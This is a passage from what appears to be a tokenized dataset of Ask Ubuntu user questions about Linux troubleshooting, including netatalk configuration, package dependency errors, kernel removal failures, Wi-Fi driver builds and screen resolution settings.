> set perm mask use with options : upriv dbpath : path - > store the database stuff in the following path . cnidserver : server [ : port ] - > query this servername or ip address ( default : localhost ) and port ( default : 4700 ) for cnids . only used with cnid backend `` dbd '' . this option here overrides any setting from afpd.conf : cnidserver . password : password - > set a volume password ( 8 characters max ) cnidscheme : scheme - > set the cnid scheme for the volume , default is [ dbd ] available schemes : [ dbd last tdb ] ea - > none|auto|sys|ad specify how extended attributes are stores . default is auto . auto : try `` sys '' ( by setting an ea on the shared directory itself ) , fallback to `` ad '' . requires writable volume for performing the test . note : options : ro overwrites `` auto '' with `` none . '' sys : use filesystem eas ad : use files in appledouble directories none : no ea support # # miscellaneous options [ syntax : options : option1 , option2 ] : tm - > enable timemachine support prodos - > make compatible with appleii clients . crlf - > enable crlf translation for text files . noadouble - > do n't create .appledouble unless a resource fork needs to be created . ro - > mount the volume as read-only . mswindows - > enforce filename restrictions imposed by ms windows . this will also invoke a default codepage ( iso8859-1 ) if one is n't already specified . nohex - > do n't do : hex translations for anything except dot files . specify usedots as well if you want that turned off . note : this option makes the / character illegal . usedots - > do n't do : hex translation for dot files . note : when this option gets set , certain file names become illegal . these are .parent and anything that starts with .apple . invisibledots - > do n't do : hex translation for dot files . note : when this option gets set , certain file names become illegal . these are .parent and anything that starts with .apple . also , dot files created on the unix side are marked invisible . limitsize - > limit disk size reporting to 2gb . this is here for older macintoshes using newer appleshare clients . yucko . nofileid - > do n't advertise createfileid , resolveid , deleteid calls root_preexec_close - > a non-zero return code from root_preexec close the volume being mounted . preexec_close - > a non-zero return code from preexec close the volume being mounted . nostat - > do n't stat volume path when enumerating volumes list upriv - > use unix privilege . illegalseq - > encode illegal sequence in filename asis , ex `` \217- '' , which is not a valid shift-jis char , is encoded as u\217 - nocnidcache - > do n't store and read cnid to/from appledouble file . this should not be used as it also prevents a cnid database rebuild with dbd ! caseinsensitive - > the underlying fs is case insensitive ( only test with jfs in os2 mode ) dropbox - > allows a volume to be declared as being a `` dropbox . '' note that netatalk must be compiled with dropkludge support for this to function . warning : this option is deprecated and might not work as expected . dropkludge - > same as `` dropbox '' nodev - > always use 0 for device number , helps when the device number is not constant across a reboot , cluster , ... # the line below sets some default , starting with netatalk 2.1. : default : options : upriv , usedots by default all users have access to their home directories . ~/ `` home directory '' /media/server/timemachine timemachine allow : timemachine cnidscheme.dbd options : usedots , upriv , tm end of file
518436	internet connection failed	i tried several ways of connecting . i 'm aware why i ca n't setup a wireless connection , but i ca n't get any drivers without internet . the real problem is that even with cable i ca n't connect . most answers on inthernet contain same thing : typing ifconfig in terminal to get information , but even though my computer does n't show any ethernet connection . i have ubuntu 12.10 .
518441	upgrade from precise - > trusty stalls with glib critical error	mid way through an upgrade from precise to trusty i get the following glib-critical error : http : //imgur.com/hfujsfq , uahiaa6 # 0 what 's the best way of recovering from this ?
518444	can not reset dconf default settings on unity 14.04	i 've installed gnome shell with sudo apt-get install gnome-desktop-environment on top of a default install of ubuntu 14.04 with unity 7.2.2 . not satisfied with the experience , i completely removed gnome shell and managed to bring my system back to a point very close to the original configuration . however , when i logged into the guest session , i realized the default theme was still adwaita , the default icon set was gnome and the default font sets the same as gnome shell has by default . i figured this was due to the fact that my dconf profile has its default settings changed/corrupted by the gnome shell installation . in other words , if i launch unity tweak tool and i click on the restore defaults in the theme tab , i will have my system trying to load adwaita instead of ambiance , even though adwaita has been removed ! the same goes for icons , cursor and fonts , each pointing to the default setting of gnome shell . this change leads to other minor yet annoying little modifications throughout the theming system . i realize that the original dconf profile resides in /etc/dconf/db , where i can now find two subdirectories , gdm.d and ibus.d . so my question is , how can i fully reset my dconf original profile with unity 's default key sets ?
518445	hardware virtualization not possible , virtualbox alternatives ?	i have two processors , but virtualbox wo n't accept that unless i have hardware virtualization ( vt-x ) enabled , for which my bios setup does n't give an option , and the option was never added in bios upgrades . as you might tell , i 've done some pretty extensive research trying to get this set up . my issue is that , setting it up with just one processor , the guest is running at 100 % of its cpu . is there some other nice gui ( could n't figure out qemu/qemu-kvm ) that would n't require vt-x to be enabled in order to take advantage of my actual hardware ? xubuntu trusty hp compaq dc5100 slim bios v1.07 intel ( r ) pentium ( r ) 4 cpu 3.00ghz ( ther 're only 2 processors , so i think 4 must refer to the cores )
518446	how to disable keybindings in terminal ?	i 'm using xubuntu 14.04 and i set up the keybindings for the function keys in settings - > keyboard - > application shortcuts to vol up , down , brightness , etc . to match the symbols on my keyboard . in terminal , and some other applications , i 'd like to disable the keybindings and use them just as function keys , is there a way to do this on a per-application basis ?
518449	problem in vlc installation on 14.04 kts	zad @ zad-hp-g60-notebook-pc : ~ $ sudo apt-get install vlc reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.1.4-0ubuntu14.04.1 ) but it is not going to be installed depends : libsdl-image1.2 ( > = 1.2.10 ) but it is not installable depends : libsdl1.2debian ( > = 1.2.11 ) but it is not installable depends : libtar0 but it is not installable depends : libva-x11-1 ( > 1.3.0~ ) but it is not installable depends : libva1 ( > 1.3.0~ ) but it is not installable depends : libvlccore7 ( > = 2.1.0 ) but it is not going to be installed depends : libxcb-composite0 but it is not installable depends : libxcb-keysyms1 ( > = 0.3.9 ) but it is not installable depends : libxcb-xv0 ( > = 1.2 ) but it is not installable recommends : vlc-plugin-notify ( = 2.1.4-0ubuntu14.04.1 ) but it is not going to be installed recommends : vlc-plugin-pulse ( = 2.1.4-0ubuntu14.04.1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages .
518451	dual boot ubuntu 14.04 with ubunut 14.04	i had ubuntu 14.04 with windows 8.1 and i deleted windows 8.1 partition with system reserved partition and when i reboot the system it did not boot . then i used a live usb and try to save followed many tutorials and i even rewrite sector 32 according to '' ubuntuforums.org/showthread.php ? t=1661254 '' finally i used boot-rescue and got over installing another ubuntu installation alongside ubuntu 14.04 . i was hoping to keep it but when i load into my old ubuntu installation nothing seems to work fine , like it does not boot correctly i ca n't get into my user account but the guest account . when i log it comes back to login screen . and i get many errors upon booting that os image , like can not connect to ubuntu live failed ( tell me if need more information ) http : //paste.ubuntu.com/8198904/ please check above link and tell me what is wrong my old ubuntu is on sda9 and new one is on sda1 gparted image and terminal fdisk -lu and df -h images
518454	what does startx command do ?	while reading about ubuntu i found the following statement ... .. if the display manager is not started by default in the default runlevel , you can start x a different way , after logging on to a text-mode console , by running startx from the command line . what does it mean to be a default runlevel ? and when i tried this on my terminal i got this : anupam @ jazz : ~ $ startx x : user not authorized to run the x server , aborting . xinit : giving up xinit : unable to connect to x server : connection refused xinit : server error
518455	pxe boot issue ( error 32 ) / tftp	i have some old laptops that i 'd like to boot via lan . first , because the drives on these are failing / have failed , and because they 're now both over 14 years old , and then for the learning experience : ) so far , i have an ubuntu server 14.04 running , with various services ( apache , samba , mysql , etc. ) . i have also installed 2 virtual machines on here ( without spice ) i 've installed all the apparent requirements to network boot , and the client image seems to have been created successfully . the boot process on the laptop does receive an ip address in the range i 've specified for the dhcp server , but then i get an error and tftp times out . if i run : netstat -an | fgrep -w 69 udp6 0 0 : ::69 : : : * the network should only be set up for ipv4 , and this to me seems like only 6 ? any assistance to diagnose further , or what might be the problem , would be greatly appreciated . thank you in advance : )
518457	autostart program whenever a file is added to the downloads folder	i have lubuntu 14.04 lts on my laptop for a few weeks now . i have been working on customizing the os and such quite a bit , as well as installing everything that i need for daily usage . one thing i did is write a c program that , when run , offers to quickly copy or move any file to any location from the downloads folder . new destinations can be easily added . anyway , i did this because i disperse my files all over the place from my downloads folder , so changing the default download location in firefox really is n't the answer . instead , i want to be able to choose on a case by case basis . the program works fine , however , i want to set it run to automatically in a terminal anytime a file is downloaded to the downloads folder .
518458	why are browsing samba shares from ubuntu ( nautilus ) so much slower than browsing from windows	i have a samba share over the a vpn server . browsing the share takes 60 times longer from ubuntu than it takes from windows . from a windows 7 virtual box ( and any other machine in the shop ) it takes 3 seconds for a folder with 1000 files to appear . clicking on the same folder from nautilus it takes over 3 minutes before the files show . the network is the same . the only difference is browsing from ubuntu vs browsing from windows . this is the /etc/fstab entry from the ubuntu machine : //myserver/officeshared /mnt/myshare cifs noauto , username=myname , uid=1001 , file_mode=0660 , dir_mode=0775 , noexec , credentials=/etc/smbpassw 0 0 i 'm sure the problem is nautilus and not ubuntu because i can get a file listing in 3 seconds with : time ls /mnt2/mckserver/mckelvey/ > ~/filelist.txt output : real 0m2.223s user 0m0.004s sys 0m0.007s
518461	too many kernel images	i upgraded from ubuntu 12.04 lts to 14.04 lts when i try to run sudo apt-get upgrade , i get : examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-33-generic /boot/vmlinuz-3.2.0-33-generic update-initramfs : deleting /boot/initrd.img-3.2.0-33-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-33-generic /boot/vmlinuz-3.2.0-33-generic generating grub configuration file ... cat : /video.lst : no such file or directory /usr/sbin/grub-probe : error : failed to get canonical path of ` ' . no path or device is specified . usage : grub-probe [ option ... ] [ option ] ... [ path|device ] try 'grub-probe -- help ' or 'grub-probe -- usage ' for more information . run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 64 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-33-generic.postrm line 328. dpkg : error processing package linux-image-3.2.0-33-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports is reached already removing linux-image-3.2.0-34-generic ( 3.2.0-34.53 ) ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-34-generic /boot/vmlinuz-3.2.0-34-generic update-initramfs : deleting /boot/initrd.img-3.2.0-34-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-34-generic /boot/vmlinuz-3.2.0-34-generic generating grub configuration file ... cat : /video.lst : no such file or directory /usr/sbin/grub-probe : error : failed to get canonical path of ` ' . no path or device is specified . usage : grub-probe [ option ... ] [ option ] ... [ path|device ] try 'grub-probe -- help ' or 'grub-probe -- usage ' for more information . run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 64 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-34-generic.postrm line 328. dpkg : error processing package linux-image-3.2.0-34-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports is reached already removing linux-image-3.2.0-35-generic ( 3.2.0-35.55 ) ... < snip > < snip > examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-65-generic /boot/vmlinuz-3.2.0-65-generic update-initramfs : deleting /boot/initrd.img-3.2.0-65-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-65-generic /boot/vmlinuz-3.2.0-65-generic generating grub configuration file ... cat : /video.lst : no such file or directory /usr/sbin/grub-probe : error : failed to get canonical path of ` ' . no path or device is specified . usage : grub-probe [ option ... ] [ option ] ... [ path|device ] try 'grub-probe -- help ' or 'grub-probe -- usage ' for more information . run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 64 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-65-generic.postrm line 328. dpkg : error processing package linux-image-3.2.0-65-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : linux-image-3.2.0-26-generic linux-image-3.2.0-27-generic linux-image-3.2.0-29-generic linux-image-3.2.0-30-generic linux-image-3.2.0-31-generic linux-image-3.2.0-32-generic linux-image-3.2.0-33-generic linux-image-3.2.0-34-generic linux-image-3.2.0-35-generic linux-image-3.2.0-36-generic linux-image-3.2.0-37-generic linux-image-3.2.0-38-generic linux-image-3.2.0-39-generic linux-image-3.2.0-40-generic linux-image-3.2.0-41-generic linux-image-3.2.0-43-generic linux-image-3.2.0-44-generic linux-image-3.2.0-45-generic linux-image-3.2.0-48-generic linux-image-3.2.0-49-generic linux-image-3.2.0-51-generic linux-image-3.2.0-52-generic linux-image-3.2.0-53-generic linux-image-3.2.0-54-generic linux-image-3.2.0-55-generic linux-image-3.2.0-56-generic linux-image-3.2.0-57-generic linux-image-3.2.0-58-generic linux-image-3.2.0-59-generic linux-image-3.2.0-60-generic linux-image-3.2.0-61-generic linux-image-3.2.0-63-generic linux-image-3.2.0-64-generic linux-image-3.2.0-65-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) lcable @ dell9150 : /boot/grub > i have no idea what 's wrong or how to fix it .
518463	update from ubuntu no longer available	i have put ubuntu 11.04 on my laptop , which i believe is now redundant . is there a disc available of the new 14.04 update or how do i get from 11.04 to 14.04 ?
518465	ttyusb not recognized in ubuntu server	i have a very basic question here i believe . when installed ubuntu ( ubuntu 14.04.1 lts ) and i type the command dmesg | grep tty , it gives me the following output : renato @ ubuntu : ~ $ dmesg | grep tty [ 0.000000 ] console [ tty0 ] enabled [ 0.515141 ] 00:0b : ttys0 at i/o 0x3f8 ( irq = 4 , base_baud = 115200 ) is a 16550a [ 0.709774 ] tty tty2 : hash matches [ 5286.474897 ] usb 1-1.2 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 5286.474959 ] usb 1-1.2 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 5286.475016 ] usb 1-1.2 : gsm modem ( 1-port ) converter now attached to ttyusb2 as you can see my 3g modem is usually recognized . but if i install ubuntu server ( the one with no graphical interface ) , the modem is not recognized . obviously there is some software that exists on the desktop version that does not exist in the version for servers , which prevents my modem to be recognized . can someone tell me what program i can install on ubuntu server for it to recognize the ttyusb ?
518467	ubuntu ca n't move files to trash with correct ownership	i 've already looked at the other posts and questions where the problem was a directory ownership problem where root was the owner of the directory instead of the actual user , but this is not the case with me . i am the owner of the directory and the directory has 775 for chmod permissions . i tried deleting the trash directory and remaking it anyways , but it did n't fix the problem . the directory is stored in ~/.local/share ( unless there 's another i do n't know of ? ) running ubuntu 14 x64 . my /home is on the same drive as my root .
518470	how to detect if gps sources are enabled using qtpositioning in ubuntu touch ?	i am using positionsource to get the latitude and longitude of the user 's location from the gps data provided by ubuntu touch . however i need to detect if gps has been enabled by the user . on reading through the official documentation for positionsource here , i found that it has the property valid which quoting the official docs says , this property is true if the positionsource object has acquired a valid backend plugin to provide data . if false , other methods on the positionsource will have no effect . applications should check this property to determine whether positioning is available and enabled on the runtime platform , and react accordingly . however this property does n't seem to update when i enable/disable the location service in ubuntu touch . i tried changing the gps status both using the gui ( location indicator ) and from the command line by , stop ubuntu-location-service-trust-stored is there any other property i can track to check whether gps is enabled/disabled on the phone ?
518472	ubuntu studio with m-audio 2496 - clean and correct instalation	folks , i had a version installed ubuntu studio and tried to make this version a lot to recognize the audio card m-audio 2496 so much that i lost my system and now did a fresh install and was wondering what the best way to make the system recognize this card the right way . thank you..
518473	lenovo g5030 not having any hardware switch for wifi or bluetooth after installing ubuntu 14.04	in rfkill it shows wifi is hard block and bluetooth is also hardblock . bluetooth soft unlock is working but wifi soft unlock is not working . bios wifi is enabled . can any body help me fix this ?
518475	how to recover from 14.04 fglrx driver install failure ?	i just updated to 14.04 from 12.04 and graphics performance was a bit choppy/sluggish ( amd/ati mobility radeon 4xxx ) . there 's so much information and advice about what to do in this situation that i felt lost , so i just decided to go ahead and try installing the fglrx drivers . i did this from the software center and now every time i boot there 's no display . the only thing i can use to interact with the system is the root shell prompt in recovery mode . can anyone tell me how to roll back or uninstall those fglrx drivers ? running sudo apt-get remove fglrx results in : unable to write to /var/cache/apt the package lists or status files could not be opened
518479	ubuntu does n't recognize android devices anymore	ubuntu 14.04 does n't recognize any of my android devices anymore . ( tried with the nexus 7 and galaxy nexus ) i thought this was an mtp or adb-problem , but connecting / disconnecting the devices does n't even change the output of lsusb or dmesg at all . it 's like the devices are n't even plugged-in . however they both charge normally , when i plug them in , so i ca n't imagine having a cable-problem or a problem with the android devices themselves . ( i 've tried it with usb-debugging on and off on both devices - no difference )
518481	how to get pid of shell running in a terminal window under mouse ?	though similar questions asked before in this forum here , here and here , my question is different . i want to get pid of a running bash process in gnome terminal . note : suggested link which posted by moderators does n't provide any working solution . i do n't understand people ignorantly vote for closing my topic . commands like xprop | awk '/pid/ { print $ 3 } ' | xargs ps h -o pid , cmd xprop _net_wm_pid | cut -d ' ' -f3 give me only gnome-terminal parent pid not bash process id if i run pid= $ $ ; echo $ pid or cut -d ' ' -f 4 /proc/self/stat gives me exact pid of terminal but i have to run those commands in terminal to get the pid . i have a script that toggles process of a terminal between kill -stop pid and kill -cont pid with a shortcut key combination . # ! /bin/bash myid= $ ( ps $ ( xdotool getwindowfocus getwindowpid ) |tail -n 1 |awk ' { print $ 3 } ' ) if [ [ $ myid == `` sl '' ] ] then kill -stop `xdotool getwindowfocus getwindowpid` else kill -cont `xdotool getwindowfocus getwindowpid` fi as i mentioned the line myid= $ ( ps $ ( xdotool getwindowfocus getwindowpid ) |tail -n 1 |awk ' { print $ 3 } ' ) returns only pid of parent gnome-terminal is there a way to achieve what i want ? ` edit : beside dmitry alexandrov 's answer , i also found another working solution here how to know the pid of active window edit2 : i spoke too early . i do n't know why but above solution is not working reliably . so i am using dmitry alexandrov 's solution , it works well except a glitch in my script . # ! /bin/bash read __ __ term_pid < < ( xprop _net_wm_pid ) & & \ sh_pid= $ ( ps -- ppid `` $ term_pid '' -o pid= ) mypid= $ ( echo $ sh_pid | awk ' { print $ 2 } ' ) myid= $ ( ps $ mypid |tail -n 1 |awk ' { print $ 3 } ' ) if [ [ $ myid == `` sl '' ] ] then kill -stop $ mypid else kill -cont $ mypid fi note : process stat is not reliable , it does n't always toggle between sl and t , it sometimes takes different states such as `ss+` `s < ` edit3 : this one works well # ! /bin/bash read __ __ term_pid < < ( xprop _net_wm_pid ) & & \ sh_pid= $ ( ps -- ppid `` $ term_pid '' -o pid= ) mypid= $ ( echo $ sh_pid | awk ' { print $ 2 } ' ) myid= $ ( ps $ mypid |tail -n 1 |awk ' { print $ 3 } ' ) if [ [ * $ myid* == * '' s '' * ] ] then kill -stop $ mypid else kill -cont $ mypid fi
518482	updated to ubuntu 14.04 lts . screen resolution stuck at 640x480 on dell dimension c521	i just updated ubuntu to 14.04 from 12.04 and i have this display issue where the monitor is stuck at 640x480 - it wo n't give me any other option choices . i used the lspci | grep vga and this is my result : 00:05.0 vga compatible controller : nvidia corporation c51 [ geforce 6150 le ] ( rev a2 ) can anyone could give me any assistance to fix this problem ?
518484	no wifi with lenovo e540	hei , i have the same problem as in no wifi connection on ubuntu 13.10 , but ca n't comment on it because of missing reputations ( i 'm new to the forum ) . that 's why i open a new question . i tried to use the solution suggested by chilli555 but get an error when executing the make command : make -c /lib/modules/3.13.0-35-generic/build m=/home/fe/rtl8723be modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.13.0-35-generic' cc [ m ] /home/fe/rtl8723be/regd.o in file included from /home/fe/rtl8723be/regd.c:31:0 : /home/fe/rtl8723be/regd.c : in function ‘_rtl_reg_apply_beaconing_flags’ : /home/fe/rtl8723be/regd.h:37:32 : error : ‘ieee80211_chan_no_ir’ undeclared ( first use in this function ) # define ieee80211_chan_no_ibss ieee80211_chan_no_ir ^ /home/fe/rtl8723be/regd.c:200:20 : note : in expansion of macro ‘ieee80211_chan_no_ibss’ ch- > flags & = ~ieee80211_chan_no_ibss ; ^ /home/fe/rtl8723be/regd.h:37:32 : note : each undeclared identifier is reported only once for each function it appears in # define ieee80211_chan_no_ibss ieee80211_chan_no_ir ^ /home/fe/rtl8723be/regd.c:200:20 : note : in expansion of macro ‘ieee80211_chan_no_ibss’ ch- > flags & = ~ieee80211_chan_no_ibss ; ^ /home/fe/rtl8723be/regd.c : in function ‘_rtl_reg_apply_active_scan_flags’ : /home/fe/rtl8723be/regd.h:34:37 : error : ‘ieee80211_chan_no_ir’ undeclared ( first use in this function ) # define ieee80211_chan_passive_scan ieee80211_chan_no_ir ^ /home/fe/rtl8723be/regd.c:237:19 : note : in expansion of macro ‘ieee80211_chan_passive_scan’ if ( ch- > flags & ieee80211_chan_passive_scan ) ^ /home/fe/rtl8723be/regd.c : in function ‘_rtl_reg_apply_radar_flags’ : /home/fe/rtl8723be/regd.h:37:32 : error : ‘ieee80211_chan_no_ir’ undeclared ( first use in this function ) # define ieee80211_chan_no_ibss ieee80211_chan_no_ir ^ /home/fe/rtl8723be/regd.c:312:8 : note : in expansion of macro ‘ieee80211_chan_no_ibss’ ieee80211_chan_no_ibss | ^ /home/fe/rtl8723be/regd.c : in function ‘_rtl_regd_init_wiphy’ : /home/fe/rtl8723be/regd.h:40:38 : error : ‘regulatory_custom_reg’ undeclared ( first use in this function ) # define wiphy_flag_custom_regulatory regulatory_custom_reg ^ /home/fe/rtl8723be/regd.c:410:18 : note : in expansion of macro ‘wiphy_flag_custom_regulatory’ wiphy- > flags |= wiphy_flag_custom_regulatory ; ^ /home/fe/rtl8723be/regd.h:43:38 : error : ‘regulatory_strict_reg’ undeclared ( first use in this function ) # define wiphy_flag_strict_regulatory regulatory_strict_reg ^ /home/fe/rtl8723be/regd.c:411:19 : note : in expansion of macro ‘wiphy_flag_strict_regulatory’ wiphy- > flags & = ~wiphy_flag_strict_regulatory ; ^ /home/fe/rtl8723be/regd.h:46:41 : error : ‘regulatory_disable_beacon_hints’ undeclared ( first use in this function ) # define wiphy_flag_disable_beacon_hints regulatory_disable_beacon_hints ^ /home/fe/rtl8723be/regd.c:412:19 : note : in expansion of macro ‘wiphy_flag_disable_beacon_hints’ wiphy- > flags & = ~wiphy_flag_disable_beacon_hints ; ^ make [ 2 ] : *** [ /home/fe/rtl8723be/regd.o ] error 1 make [ 1 ] : *** [ _module_/home/fe/rtl8723be ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-35-generic' make : *** [ all ] error 2` pointy commented that another post worked for him , but i ca n't find it .
518485	ubuntu server 14.04 clean install on new system	is there a known fault with the ubuntu server 14.04 ( x64 ) causing a system hanging problem ? system configuration : asus kgpe-d16 main board . ( bios version 3201 , build date 02/19/2013 ) opteron 6308 - 3.5ghz processors 128gb ddr3 ram ( split 64gb for each processor ) twinned samsung ssd 840 ev drives twinned seagate st2000nm0033-92m17 physical hard drives standard hl-dt-st dvdram gh optical drive legacy support usb 2.0 drive ports the bios has been updated to the current release , as well as server management options enabled with the proper updates to the firmware installed . i have also perused through other questions & answers , but there seems to be no clearly defined answer that provides a resolution at this time . **additional info : the system finished a complete 14.04 installation and currently hangs after the initial bios boot sequence . just a plain cursor ( command prompt ) but does not respond to any system commands via keyboard except for ctrl + alt + del . suggestions ?
518487	does my computer have 1 or 2 cpus ? ( cpuinfo and lscpu differ )	when i run cat /proc/cpuinfo i get the following output ( only the relevant line included ) : cpu cores : 1 however , lscpu gives me the following output : cpu ( s ) : 2 which of the two is correct , and more importantly , why are they giving me different results ? the full output of cat /proc/cpuinfo is : processor : 0 vendor_id : genuineintel cpu family : 15 model : 3 model name : intel ( r ) pentium ( r ) 4 cpu 2.80ghz stepping : 4 microcode : 0xe cpu mhz : 2800.135 cache size : 1024 kb physical id : 0 siblings : 2 core id : 0 cpu cores : 1 apicid : 0 initial apicid : 0 fdiv_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe constant_tsc pebs bts pni dtes64 monitor ds_cpl cid xtpr bogomips : 5600.27 clflush size : 64 cache_alignment : 128 address sizes : 36 bits physical , 32 bits virtual power management : processor : 1 vendor_id : genuineintel cpu family : 15 model : 3 model name : intel ( r ) pentium ( r ) 4 cpu 2.80ghz stepping : 4 microcode : 0xe cpu mhz : 2800.135 cache size : 1024 kb physical id : 0 siblings : 2 core id : 0 cpu cores : 1 apicid : 1 initial apicid : 1 fdiv_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe constant_tsc pebs bts pni dtes64 monitor ds_cpl cid xtpr bogomips : 5600.27 clflush size : 64 cache_alignment : 128 address sizes : 36 bits physical , 32 bits virtual power management : the full output of lscpu is : architecture : i686 cpu op-mode ( s ) : 32-bit byte order : little endian cpu ( s ) : 2 on-line cpu ( s ) list : 0,1 thread ( s ) per core : 2 core ( s ) per socket : 1 socket ( s ) : 1 vendor id : genuineintel cpu family : 15 model : 3 stepping : 4 cpu mhz : 2800.135 bogomips : 5600.27 l1d cache : 16k l2 cache : 1024k ( this can also be viewed at https : //gist.github.com/iqandreas/f3f9139b8968987d3716 . )
518492	setting screen resolution ubuntu 14.04 lts	best resolution for my monitor is 1440 x 900 . i had everything working well , but after some update the screen was totally black on startup so i had to reinstall nvidia drivers . now i have lower resolution and i 've been trying whole day to set the `` best one '' but without success . firstly i was trying to make some different changes in xorg.conf file . at the moment it looks like that : section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : builtin , vertrefresh source : builtin identifier `` monitor0 '' vendorname `` unknown '' modelname `` crt-1 '' horizsync 30-82 vertrefresh 56-76 # monitor preferred modeline ( 59.9 hz vsync , 55.9 khz hsync , ratio 16/10 , 91 dpi ) # modeline `` nvidia-auto-select '' 65.000 1024 1048 1184 1344 768 771 777 806 -hsync -vsync # monitor preferred modeline ( 59.9 hz vsync , 55.9 khz hsync , ratio 16/10 , 91 dpi ) modeline `` 1440x900 '' 106.5 1440 1520 1672 1904 900 903 909 934 +hsync -vsync # tv fullscreen mode or dvd fullscreen output . # 768x576 @ 79 hz , 50 khz hsync modeline `` 768x576 '' 50.00 768 832 846 1000 576 590 595 630 # 768x576 @ 100 hz , 61.6 khz hsync modeline `` 768x576 '' 63.07 768 800 960 1024 576 578 590 616 # modeline generated by gtf ( 1 ) [ handled by xfdrake ] modeline `` 1440x900_120 '' 229.75 1440 1552 1712 1984 900 901 904 965 -hsync +vsync # modeline generated by gtf ( 1 ) [ handled by xfdrake ] modeline `` 1440x900_100 '' 187.55 1440 1544 1704 1968 900 901 904 953 -hsync +vsync # modeline generated by gtf ( 1 ) [ handled by xfdrake ] modeline `` 1440x900_85 '' 156.79 1440 1536 1696 1952 900 901 904 945 -hsync +vsync # modeline generated by gtf ( 1 ) [ handled by xfdrake ] modeline `` 1440x900_75 '' 136.49 1440 1536 1688 1936 900 901 904 940 -hsync +vsync # modeline generated by gtf ( 1 ) [ handled by xfdrake ] modeline `` 1440x900_60 '' 106.47 1440 1520 1672 1904 900 901 904 932 -hsync +vsync # modeline generated by gtf ( 1 ) [ handled by xfdrake ] modeline `` 1440x900_50 '' 87.41 1440 1512 1664 1888 900 901 904 926 -hsync +vsync # modeline generated by gtf ( 1 ) [ handled by xfdrake ] modeline `` 1280x800_120 '' 181.21 1280 1376 1520 1760 800 801 804 858 -hsync +vsync # modeline generated by gtf ( 1 ) [ handled by xfdrake ] modeline `` 1280x800_100 '' 147.89 1280 1376 1512 1744 800 801 804 848 -hsync +vsync # modeline generated by gtf ( 1 ) [ handled by xfdrake ] modeline `` 1280x800_85 '' 123.38 1280 1368 1504 1728 800 801 804 840 -hsync +vsync # modeline generated by gtf ( 1 ) [ handled by xfdrake ] modeline `` 1280x800_75 '' 107.21 1280 1360 1496 1712 800 801 804 835 -hsync +vsync # modeline generated by gtf ( 1 ) [ handled by xfdrake ] modeline `` 1280x800_60 '' 83.46 1280 1344 1480 1680 800 801 804 828 -hsync +vsync # modeline generated by gtf ( 1 ) [ handled by xfdrake ] modeline `` 1280x800_50 '' 68.56 1280 1336 1472 1664 800 801 804 824 -hsync +vsync option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gts 250 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` crt-1 '' # option `` metamodes '' `` 1152x864_60 +0+0 ; nvidia-auto-select +0+0 '' option `` metamodes '' `` dfp-0 : nvidia-auto-select , dfp-1 : nvidia-auto-select ; nvidia-auto-select { viewportin=1920x1080 } ; nvidia-auto-select { viewportin=1680x1050 } ; nvidia-auto-select { viewportin=1600x1200 } ; nvidia-auto-select { viewportin=1440x900 } ; nvidia-auto-select { viewportin=1400x1050 } ; nvidia-auto-select { viewportin=1280x1024 } ; nvidia-auto-select { viewportin=1280x960 } ; nvidia-auto-select { viewportin=1280x800 } ; nvidia-auto-select { viewportin=1152x864 } ; nvidia-auto-select { viewportin=1024x768 } ; nvidia-auto-select { viewportin=832x624 } ; nvidia-auto-select { viewportin=800x600 } ; nvidia-auto-select { viewportin=700x525 } ; nvidia-auto-select { viewportin=640x480 } ; nvidia-auto-select { viewportin=512x384 } ; nvidia-auto-select { viewportin=400x300 } ; nvidia-auto-select { viewportin=320x240 } '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 modes `` 1440x900 '' `` 1280x800 '' `` 1024x768 '' `` 